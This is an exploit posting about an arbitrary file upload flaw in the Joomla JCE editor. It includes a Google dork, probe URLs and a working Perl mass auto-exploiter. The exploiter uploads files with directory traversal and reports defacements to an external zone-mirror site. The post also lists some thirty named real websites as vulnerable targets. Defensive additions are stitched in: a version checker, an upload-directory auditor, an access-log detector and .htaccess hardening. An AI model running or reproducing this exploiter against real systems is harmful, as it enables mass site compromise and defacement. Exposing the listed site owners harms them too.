Joomla JCE 2.6.33 Arbitrary File Upload
Posted Dec 1, 2018
Authored by KingSkrupellos

Joomla JCE component versions 2.6.7.1 through 2.6.33 suffer from an arbitrary file upload vulnerability.

tags | exploit, arbitrary, file upload
MD5 | 5c23c1abd98f1e33707301cc61401134

#################################################################################

# Exploit Title : Joomla Content Editor JCE com_jce Components Image Manager Plugin 2.6.33 Remote File Upload Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Vulnerability Published Date : 30/11/2018
# Vulnerability First Discovered Date : 10/03/2014
# Vendor Homepage : joomlacontenteditor.net
# Software Download Links : joomlacontenteditor.net/downloads /
+ extensions.joomla.org/extension/jce/ ~ joomlacontenteditor.net/downloads/editor/core ~
+ joomlacontenteditor.net/downloads/editor/core/9
+ JCE 2.6.33 => joomlacontenteditor.net/downloads/editor/core?task=callelement&format=raw&item_id=1353&element=f85c494b-2b32-4109-b8c1-083cca2b7db6&method=download&args[0]=9ee3309d5768681d0360490d647c2266
+ JCE 2.6.7.1 => joomlacontenteditor.net/downloads/editor/core?task=callelement&format=raw&item_id=1255&element=f85c494b-2b32-4109-b8c1-083cca2b7db6&method=download&args[0]=547c7217f6fad641a91db0b982dd72b6
# Version Information : From JCE 2.6.7.1 to JCE 2.6.33 All Versions are affected.
+ Installation package for Joomla! 2.5 & 3.x - Previous Versions before 2.x are not affected.
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : High
# Google Dorks => inurl:''/index.php?option=com_jce''
# Vulnerability Type : CWE-264 - [ Permissions, Privileges, and Access Controls ]

##############################################################################################

++++++++++++ Extended Exploit and Vulnerability Information Reference Links +++++++++++++

# CxSecurity Exploit Link : cxsecurity.com/ascii/WLB-2018050200
# Exploit4Arab Exploit Link : exploit4arab.org/exploits/2118
# ExploitAlert Exploit Link : exploitalert.com/view-details.html?id=29762
# SecurityNewsWire Exploit Link : securitynewswire.com/latestsecuritynews/mobile_article.php?title=Joomla_Content_Editor_JCE_ImageManager_Vulnerability_Mass_Auto_Exploiter
# Reddit Exploit Link : reddit.com/r/phpAdvisories/comments/8lzi1t/joomla_content_editor_jce_imagemanager/
# HackerTor Exploit Link : hackertor.com/2018/05/24/joomla-content-editor-jce-imagemanager-vulnerability-mass-auto-exploiter/
# PhpSecure Exploit Link : phpsecure.info/go/163420.html
# Cyberizm Exploit Link : cyberizm.org/cyberizm-joomla-content-editor-jce-auto-mass-exploiter.html

##############################################################################################

Original Exploit Title :

Joomla Content Editor JCE Image Manager Plugin 2.6.33 Remote File Upload Vulnerability and Mass Auto Exploiter Perl

##############################################################################################

# Description of the Product =>

JCE makes creating and editing Joomla!® content easy...
Add a set of tools to your Joomla!® environment that gives you the power to create the kind of content you want, without limitations, and without needing to know or learn HTML, XHTML, CSS...

Office-like functions and familiar buttons make formatting simple
Upload, rename, delete, cut/copy/paste images and insert them into your articles using an intuitive and familiar interface
Create Links to Categories, Articles, Weblinks and Contacts in your site using a unique and practical Link Browser
Easily tab between WYSIWYG, Code and Preview modes.
Create Tables, edit Styles, format text and more...
Integrated Spellchecking using your browser's Spellchecker
Fine-grained control over the editor layout and features with Editor Profiles

Media Manager => Upload and insert a range of common media files including Adobe® Flash®, Apple Quicktime®, Windows Media Player® and HTML 5 Video and Audio.
Easily insert Youtube and Vimeo videos - just paste in the URL and Insert!
Insert HTML5 Video and Audio with multiple source options

Image Manager Extended => Create a thumbnail of any part of an image with the Thumbnail Editor
Insert multiple images. Create responsive images with the srcset attribute
Create image popups in a few clicks - requires JCE MediaBox or compatible Popup Extension

Filemanager => Create links to images, documents, media and other common file types
Include a file type icon, file size and modified date
Insert as a link or embed the document with an iframe
Create downloadable files using the download attribute.

Template Manager => Insert pre-defined template content from HTML or text files
Create template snippet files from whole articles or selected content
Configure the Template Manager to set the startup content of new articles

##############################################################################################

Outdated versions of the Joomla extension JCE contain a very serious security vulnerability that allows a hacker to upload files remotely to a website.
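The header above gives the affected range as JCE 2.6.7.1 through 2.6.33. The following is an added example written for this page, not code from the advisory or from the JCE project, that a site owner can point at a Joomla root to see whether the installed JCE falls inside that range. It assumes the component manifest sits at administrator/components/com_jce/jce.xml and carries a <version> element; that path is an assumption about the package layout, and the sample manifest is constructed.

```python
"""Check an installed JCE version against the range this advisory names.

Added example for this page, not code from the advisory or the JCE project.
It assumes the component manifest lives at
administrator/components/com_jce/jce.xml under the Joomla root and carries a
<version> element; that location is an assumption about the package layout.
"""
import re
import xml.etree.ElementTree as ET
from pathlib import Path

# Range stated in the advisory: JCE 2.6.7.1 through 2.6.33 are affected.
AFFECTED_LOW = (2, 6, 7, 1)
AFFECTED_HIGH = (2, 6, 33, 0)
MANIFEST_REL = Path("administrator/components/com_jce/jce.xml")  # assumed path


def parse_version(text: str) -> tuple:
    """'2.6.33' -> (2, 6, 33, 0); '2.6.7.1' -> (2, 6, 7, 1). Always four parts."""
    parts = [int(p) for p in re.findall(r"\d+", text)]
    if not parts:
        raise ValueError(f"no numeric version in {text!r}")
    return tuple((parts + [0, 0, 0, 0])[:4])


def is_affected(version: str) -> bool:
    """True when the version lies inside the advisory's affected range."""
    return AFFECTED_LOW <= parse_version(version) <= AFFECTED_HIGH


def version_from_manifest(xml_text: str) -> str:
    """Read the <version> element from a Joomla extension manifest."""
    node = ET.fromstring(xml_text.encode("utf-8")).find("version")
    if node is None or not (node.text or "").strip():
        raise ValueError("manifest has no <version> element")
    return node.text.strip()


def check_joomla_root(joomla_root: str) -> dict:
    """Report whether JCE is present under a Joomla root and whether it is affected."""
    manifest = Path(joomla_root) / MANIFEST_REL
    if not manifest.is_file():
        return {"installed": False, "version": None, "affected": False}
    version = version_from_manifest(manifest.read_text(encoding="utf-8"))
    return {"installed": True, "version": version, "affected": is_affected(version)}


# Constructed sample manifest, shaped like a Joomla extension manifest.
SAMPLE_MANIFEST = """<?xml version="1.0" encoding="utf-8"?>
<extension type="component" version="3.0" method="upgrade">
  <name>COM_JCE</name>
  <version>2.6.33</version>
</extension>
"""

if __name__ == "__main__":
    v = version_from_manifest(SAMPLE_MANIFEST)
    print(f"JCE {v}: {'inside affected range, update' if is_affected(v) else 'outside affected range'}")
```

Versions are padded to four components before comparison so that 2.6.33 sits inside the range while 2.6.7 (below 2.6.7.1) and 2.6.34 fall outside it.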

You can search all plugins and themes to find more sites.

Most of them have this plugin JCE installed. [ % 40 or more ] Use your
brain.

Explanation for Joomla Content Editor JCE =>

[ ScreenShot from Administrator Control Panel ] =>

cdn.pbrd.co/images/Hmx6KZC.jpg ~ cdn.pbrd.co/images/HmypA0v.png

Note : This is not the older JCE exploit that wrote to this path =>
..../images/stories/......php => NO

Previous Version Exploit Link => bugreport.ir/78/exploit.htm => This doesn't work for this vulnerability.

Notes => The Joomla Content Editor JCE Toggle Editor / Image Manager sits behind the Administration Panel

[ ScreenShot ] => https://cdn.pbrd.co/images/Hmx6KZC.jpg

This exploit has no path :

We don't need any username and password to bypass the admin panel. There is a little trick here.

TARGETSITE/yourfilename.png .gif .jpg or
TARGETSITE/images/yourfilename.html => YES

.php .asp .jpg .gif .png =>
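The point above is that the uploaded file ends up as a .png/.gif/.jpg or .html file directly under the site root or under /images/. An added example, not part of the advisory or of JCE, that a site owner can run over the images tree to find such leftovers: it checks image extensions against their leading bytes, flags script and markup extensions, and flags HTML or PHP content stored under an image name, while leaving Joomla's empty index.html directory placeholders alone unless they carry code. The directory layout and sample files are constructed for the demo.

```python
"""Audit a Joomla images directory for files an abused JCE upload would leave.

Added example for this page, not code from the advisory or the JCE project.
It flags (a) files with script/markup extensions under the images tree,
(b) files whose bytes do not match their image extension, and (c) HTML or
PHP markup stored under an image or .html name. Joomla's index.html
placeholders are tolerated unless they contain code. The directory layout
and sample files are constructed for the demo.
"""
import os
import tempfile
from pathlib import Path

# Leading bytes a genuine file of each image type must start with.
IMAGE_MAGIC = {
    ".png": (b"\x89PNG\r\n\x1a\n",),
    ".gif": (b"GIF87a", b"GIF89a"),
    ".jpg": (b"\xff\xd8\xff",),
    ".jpeg": (b"\xff\xd8\xff",),
}
# Extensions that have no business in an image upload directory.
DISALLOWED_EXT = {".php", ".phtml", ".php3", ".php4", ".php5", ".phar",
                  ".html", ".htm", ".shtml", ".cgi", ".pl", ".py", ".asp"}
# Tokens that mean executable code (matched case-insensitively in the first 4 KiB) ...
ACTIVE_MARKERS = (b"<?php", b"<?=", b"<script", b"<iframe")
# ... and tokens that merely mean "this is a web page, not an image".
MARKUP_MARKERS = ACTIVE_MARKERS + (b"<html", b"<!doctype")


def classify_file(path: Path) -> list:
    """Return the reasons a file looks suspicious; an empty list means clean."""
    reasons = []
    ext = path.suffix.lower()
    with path.open("rb") as fh:
        head = fh.read(4096)
    lowered = head.lower()
    # Joomla ships a blank index.html in every directory; keep it unless it carries code.
    if path.name.lower() == "index.html":
        if any(m in lowered for m in ACTIVE_MARKERS):
            reasons.append("code inside directory placeholder index.html")
        return reasons
    if ext in DISALLOWED_EXT:
        reasons.append(f"disallowed extension {ext} under images")
    if ext in IMAGE_MAGIC and not head.startswith(IMAGE_MAGIC[ext]):
        reasons.append(f"content does not match {ext} signature")
    if any(m in lowered for m in MARKUP_MARKERS):
        reasons.append("script or HTML markup inside file")
    return reasons


def audit_images_dir(root: str) -> dict:
    """Walk root and map each suspicious file (POSIX relative path) to its reasons."""
    findings = {}
    for dirpath, _dirs, filenames in os.walk(root):
        for name in filenames:
            p = Path(dirpath) / name
            reasons = classify_file(p)
            if reasons:
                findings[p.relative_to(root).as_posix()] = reasons
    return findings


def build_demo_tree(base: str) -> str:
    """Write a constructed images/ tree: two clean files and three bad ones."""
    images = Path(base) / "images"
    (images / "stories").mkdir(parents=True, exist_ok=True)
    # Joomla-style empty placeholder: clean.
    (images / "index.html").write_bytes(b"<!DOCTYPE html><title></title>")
    # Genuine PNG signature followed by filler: clean.
    (images / "logo.png").write_bytes(b"\x89PNG\r\n\x1a\n" + b"\x00" * 64)
    # HTML saved under an upload name: the ".html => YES" case above.
    (images / "yourfilename.html").write_bytes(b"<html><body>test page</body></html>")
    # PHP wearing a .png extension (harmless echo, constructed for the demo).
    (images / "stories" / "cache.png").write_bytes(b"<?php echo 'demo'; ?>")
    # Plain text with a .gif name: wrong signature, no markup.
    (images / "note.gif").write_bytes(b"not really an image")
    return str(images)


def run_demo() -> dict:
    """Build the constructed tree in a temp dir and audit it."""
    with tempfile.TemporaryDirectory() as tmp:
        return audit_images_dir(build_demo_tree(tmp))


if __name__ == "__main__":
    for rel, why in sorted(run_demo().items()):
        print(f"{rel}: {'; '.join(why)}")
```

Only the first 4 KiB of each file is read, which is enough for the signature check and catches the common case of a script stored whole under an image name; a polyglot that hides code deep inside a real image would need a full-content scan.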

##############################################################################################

Install JCE Editor in Joomla! 2.5 Tutorial

[video=youtube]https://www.youtube.com/watch?v=oQdyi_xKJBk[/video]

Joomla 3 Tutorial #7: Using the Joomla Content Editor (JCE) Tutorial

[video=youtube]https://www.youtube.com/watch?v=fI0_S-T1gK8[/video]

How to Update/Upgrade a Joomla! Page that uses JCE, the Joomla Content Editor. Fix the Bugs for this Vulnerability

[video=youtube]https://www.youtube.com/watch?v=X6h5kcAxvu0[/video]

##############################################################################################

Solution for this Security Issue =>

Add a .htaccess file in /images/ and in the /public_html/ (site root) folder that disallows any scripts from running.

Put this in your .htaccess file:

AddHandler cgi-script .php .php3 .php4 .phtml .pl .py .jsp .asp .htm .shtml .sh .cgi .exe .png .jpg .gif .txt .html .htm
Options -ExecCGI

This maps files with those extensions to the CGI handler while CGI execution is switched off, so Apache refuses to run them and answers with a FORBIDDEN (403) error if they are requested. Note that the list also covers .png, .jpg, .gif, .txt and .html, so placed in the site root it stops ordinary images and HTML pages from being served too; keep it to the upload directory or trim the list to script extensions.

Another thing to consider in the .htaccess is something like this:

RewriteEngine on
RewriteCond %{HTTP_REFERER} !^$
RewriteCond %{HTTP_REFERER} !^http://(.+\.)?yourwebsite.com/.*$ [NC]
RewriteRule \.(gif|jpg|png)$ - [F]

The above will not allow anyone to view the images unless they are viewing them as content on "yourwebsite.com". This stops people from hotlinking your images.

Or you can try this =>

1. add the following .htaccess as ./images/.htaccess to prevent a PHP shell from running (note: php_flag is only understood when PHP runs as an Apache module; under PHP-FPM/FastCGI the unknown directive makes Apache return a 500 error for that directory)

#####################
Options -Indexes
php_flag engine 0
RemoveHandler .phtml .php .php3 .php4 .php5 .php6 .phps .cgi .exe .pl .asp .aspx .shtml .shtm .fcgi .fpl .jsp .htm .html .wml .gif .png .jpg .txt
AddType application/x-httpd-php-source .phtml .php .php3 .php4 .php5 .php6 .phps .cgi .exe .pl .asp .aspx .shtml .shtm .fcgi .fpl .jsp .htm .html .wml .gif .png .jpg .txt

#####################

2. deny access to the /tmp folder by adding ./tmp/.htaccess with the following content

#####################

deny from all

#####################

##############################################################################################

You can check these request URLs in your browser to test whether a site is vulnerable; you will see error responses like the ones below.

For Exploiting the Sites - use Auto Mass Exploiter Perl.

Exploit =>

/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20

{"result":{"error":true,"result":""},"error":null}

Exploit =>

/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload

{"result":null,"error":"No function call specified!"}

Exploit =>

/component/option,com_jce/action,upload/file,imgmanager/lang,en/method,form/plugin,imgmanager/task,plugin/

{"result":null,"error":"No function call specified!"}

Directory File Path =>

TARGETSITE/yourfilename.png

or

TARGETSITE/images/yourfilename.png
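The request URLs and JSON replies above are what a probe looks like from the client side; on the server they appear in the Apache access log. The following added example, not part of the advisory, matches both URL forms quoted above (the index.php?option=com_jce&...&plugin=imgmanager form and the SEF /component/option,com_jce/.../plugin,imgmanager/ form) in Apache combined-format log lines, marks a POST to the image manager as an upload attempt, and correlates a later fetch of an image or HTML file by the same client with it. The log lines are constructed samples using documentation-range IP addresses.

```python
"""Spot JCE Image Manager probes and upload attempts in Apache access logs.

Added example for this page, not code from the advisory. It recognises the
two URL forms quoted in the advisory, marks a POST to them as an upload
attempt, and correlates a later fetch of an image/HTML file by the same
client. The log lines are constructed samples in Apache combined format.
"""
import re
from urllib.parse import parse_qs, urlsplit

# Apache combined log format: ip ident user [time] "METHOD url proto" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<url>\S+)(?: [^"]*)?" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)
# SEF (search-engine-friendly) route form of the image manager URL.
SEF_RE = re.compile(r"/option,com_jce/.*plugin,imgmanager", re.IGNORECASE)
# File types the advisory says the upload lands as.
UPLOAD_EXTS = (".png", ".gif", ".jpg", ".html", ".txt")


def is_jce_imgmanager(url: str) -> bool:
    """True for both the query-string and the SEF URL forms of the image manager."""
    parts = urlsplit(url)
    if SEF_RE.search(parts.path):
        return True
    q = parse_qs(parts.query)
    return q.get("option") == ["com_jce"] and q.get("plugin") == ["imgmanager"]


def classify(method: str, url: str) -> str:
    """upload_attempt for POST; upload_probe when the URL names action=upload; else probe."""
    if method == "POST":
        return "upload_attempt"
    q = parse_qs(urlsplit(url).query)
    if q.get("action") == ["upload"] or "action,upload" in url:
        return "upload_probe"
    return "probe"


def scan(lines) -> list:
    """Return one finding per matching line, in log order."""
    findings, uploaders = [], set()
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, url = m["ip"], m["url"]
        if is_jce_imgmanager(url):
            kind = classify(m["method"], url)
            if kind == "upload_attempt":
                uploaders.add(ip)
        elif ip in uploaders and urlsplit(url).path.lower().endswith(UPLOAD_EXTS):
            kind = "followup_fetch"  # same client reading back a freshly uploaded file
        else:
            continue
        findings.append({"ip": ip, "method": m["method"], "status": int(m["status"]),
                         "kind": kind, "url": url})
    return findings


# Constructed sample log lines (RFC 5737 documentation addresses).
SAMPLE_LOG = [
    '203.0.113.7 - - [30/Nov/2018:10:01:02 +0000] "GET /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20 HTTP/1.1" 200 51 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [30/Nov/2018:10:01:03 +0000] "POST /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20 HTTP/1.1" 200 63 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [30/Nov/2018:10:01:04 +0000] "GET /images/yourfilename.png HTTP/1.1" 200 1337 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [30/Nov/2018:10:05:00 +0000] "GET /component/option,com_jce/action,upload/file,imgmanager/lang,en/method,form/plugin,imgmanager/task,plugin/ HTTP/1.1" 200 48 "-" "curl/7.61.0"',
    '192.0.2.4 - - [30/Nov/2018:10:06:00 +0000] "GET /index.php?option=com_content&view=article&id=5 HTTP/1.1" 200 8123 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"{f['kind']:15} {f['ip']:14} {f['method']} {f['status']} {f['url']}")
```

A GET to the image manager from an anonymous client is only a probe; the POST is the event worth alerting on, and a 200 on a following GET for a new file under /images/ by the same address is the signal that the upload actually landed.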

##############################################################################################

Joomla JCE Image Manager Auto Mass Exploiter Perl =>

#!/usr/bin/perl
use Term::ANSIColor;
use LWP::UserAgent;
use HTTP::Request;
use HTTP::Request::Common qw(POST);
$ua = LWP::UserAgent->new(keep_alive => 1);
$ua->agent("Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.4)
Gecko/20030624 Netscape/7.1 (ax)");
$ua->timeout (10);
system('title Joomla JCE All Versions Mass Auto Exploiter Perl by
KingSkrupellos');
print "JCE Mass Auto Exploiter\n";
print "Coded by KingSkrupellos\n";
print "Cyberizm Digital Security Team\n";
print "Please Give WebSites List Here:";
my $list=<STDIN>;
chomp($list);
open (THETARGET, "<$list") || die ">>>WebSite cannot be open. Wrong URL
Link<<< !";
@TARGETS = <THETARGET>;
close THETARGET;
$link=$#TARGETS + 1;

foreach $site(@TARGETS){

chomp $site;
if($site !~ /http:\/\//) { $site = "http://$site/"; };
$exploiturl="/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20";
print "wait upload $site\n";

$vulnurl=$site.$exploiturl;
$res = $ua->get($vulnurl)->content;
if ($res =~ m/No function call specified!/i){
open(save, '>>C:\Users\YOURNAMEHERE\KingSkrupellos\result\list.txt');

print "\n[Uploading]";
my $res = $ua->post($vulnurl,
Content_Type => 'form-data',
Content => [
'upload-dir' => './../../',
'upload-overwrite' => 0,
'Filedata' => ["kingskrupellos.png"],
'action' => 'upload'

]
)->decoded_content;
if ($res =~ m/"error":false/i){

}else{
print " ......... ";
print color('bold white');
print "[";
print color('reset');
print color('bold green');
print "PATCHED";
print color('reset');
print color('bold white');
print "] \n";
print color('reset');
}

$remote = IO::Socket::INET->new(
Proto=>
PeerAddr=>"$site",
PeerPort=>
Timeout=>
);
$def= "$site/kingskrupellos.png";
print colored ("[+]Successfully Exploited",'white on_red'),"\n";
print "$site/kingskrupellos.png\n";
}else{
print colored (">>Exploit Don't Work. Wrong URL Link. Not
Vulnerable.<<",'white on_blue'),"\n";
}
}
sub zonpost{
$req = HTTP::Request->new(GET=>$link);
$useragent = LWP::UserAgent->new();
$response = $useragent->request($req);
$ar = $response->content;
if ($ar =~ /Hacked By KingSkrupellos/){

$dmn= $link;
$def="KingSkrupellos";
$zn="http://aljyyosh.org/single.php";
$lwp=LWP::UserAgent->new;
$res=$lwp -> post($zn,[
'defacer' => $def,
'domain1' => $dmn,
'hackmode' => '15',
'reason' => '1',
'GAPnder' => 'Send',
]);
if ($res->content =~ /color="red">(.*)<\/font><\/li>/) {
print colored ("[-]Send WebSites to Mirror $1",'white on_green'),"\n";
}
else
{
print colored ("[-]Error Has Occured",'black on_white'),"\n";
}
}else{
print" Zone Could'nt be Taken From Aljyyosh!! \n";

}
}

##############################################################################################

# Usage Explained =>

Download XAMPP for your Operating System => apachefriends.org/download.html

XAMPP for Windows 5.6.38, 7.0.32, 7.1.24 & 7.2.12

XAMPP for Linux 5.6.38, 7.0.32, 7.1.24 & 7.2.12

XAMPP for OS X 5.6.38, 7.0.32, 7.1.24, 7.2.12, XAMPP-VM & XAMPP-VM

How to use this Perl code on your operating system, e.g. Windows ; [ You can run this code on Linux too. ]

Open Start + Go to Search Button + Type + Command Prompt => or cmd.exe

Or you can use ConEmulator for Windows => conemu.github.io => Download it and use it.

Create a folder like " jcee " on your Desktop and put your jceexploit.pl and yourimagefile.png ,gif ,png ,html ,txt in it

C:/Users/Your-Computer-Name/

cd Desktop

cd "jcee"

perl yourexploitcodenamejce.pl

site.txt

Waiting for Upload

Exploit Successful or Not

Finished

##############################################################################################

Example Vulnerable Sites => [ More on Search Engines like Google - Yahoo - Bing and others etc.. - Use your Brain... ]

abcdance.ro/component/option,com_jce/action,upload/file,imgmanager/lang,en/method,form/plugin,imgmanager/task,plugin/

{"result":{"error":true,"result":""},"error":null}

sv-pfaffenhofen.de/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload

{"result":{"error":true,"result":""},"error":null}

http://www.mocollc.com/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload

{"result":{"error":true,"result":""},"error":null}

sisdesign.com.br/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload

{"result":{"error":true,"result":""},"error":null}

horizonclimatecontrols.ca/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload

{"result":{"error":true,"result":""},"error":null}

living-anatomy.com/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload

{"result":{"error":true,"result":""},"error":null}

vera-karelli.ru/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload

{"result":{"error":true,"result":""},"error":null}

noatrans.fr/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload

{"result":{"error":true,"result":""},"error":null}

vietthiphotography.com/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload

{"result":{"error":true,"result":""},"error":null}

franciscoqueiroz.com.br/portal/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload

{"result":{"error":true,"result":""},"error":null}

dessupoiu.org/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload

{"result":{"error":true,"result":""},"error":null}

restoran-tamada.ru/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload

{"result":{"error":true,"result":""},"error":null}

elsonllc.com/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload

{"result":{"error":true,"result":""},"error":null}

aidem.in/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload

{"result":{"error":true,"result":""},"error":null}

ruralsouthtexasedc.org/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload

{"result":{"error":true,"result":""},"error":null}

parbutaranfurniture.com/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload

{"result":{"error":true,"result":""},"error":null}

anhadesigns.com/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload

{"result":{"error":true,"result":""},"error":null}

heartofasportsman.com/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload

{"result":{"error":true,"result":""},"error":null}

sv-langwedel.de/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload

{"result":{"error":true,"result":""},"error":null}

laboratoriodellarte.it/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload

{"result":{"error":true,"result":""},"error":null}

wagadu-jikke.org/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload

{"result":{"error":true,"result":""},"error":null}

lasolida.it/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload

{"result":{"error":true,"result":""},"error":null}

premiorenatofucini.it/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload

{"result":{"error":true,"result":""},"error":null}

poliambulatoriolattanzi.it/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload

{"result":{"error":true,"result":""},"error":null}

specialitainvetrina.com/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload

{"result":{"error":true,"result":""},"error":null}

comune.scalea.cs.it/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload

{"result":{"error":true,"result":""},"error":null}

cavambrosiano.it/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload

{"result":{"error":true,"result":""},"error":null}

fratellidisoledad.it/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload

{"result":{"error":true,"result":""},"error":null}

vitaminasport.bg/?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload

{"result":{"error":true,"result":""},"error":null}

personnalisationcarte.com/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload

{"result":{"error":true,"result":""},"error":null}

taxi3305050.ru/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload

{"result":{"error":true,"result":""},"error":null}

studioconsulenzasportiva.com/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload

{"result":{"error":true,"result":""},"error":null}

misericordiamontalto.org/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload

{"result":{"error":true,"result":""},"error":null}


THE END

##############################################################################################

The author is not responsible for any damage to the websites. This article has been written for educational purposes.

##############################################################################################

Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

##############################################################################################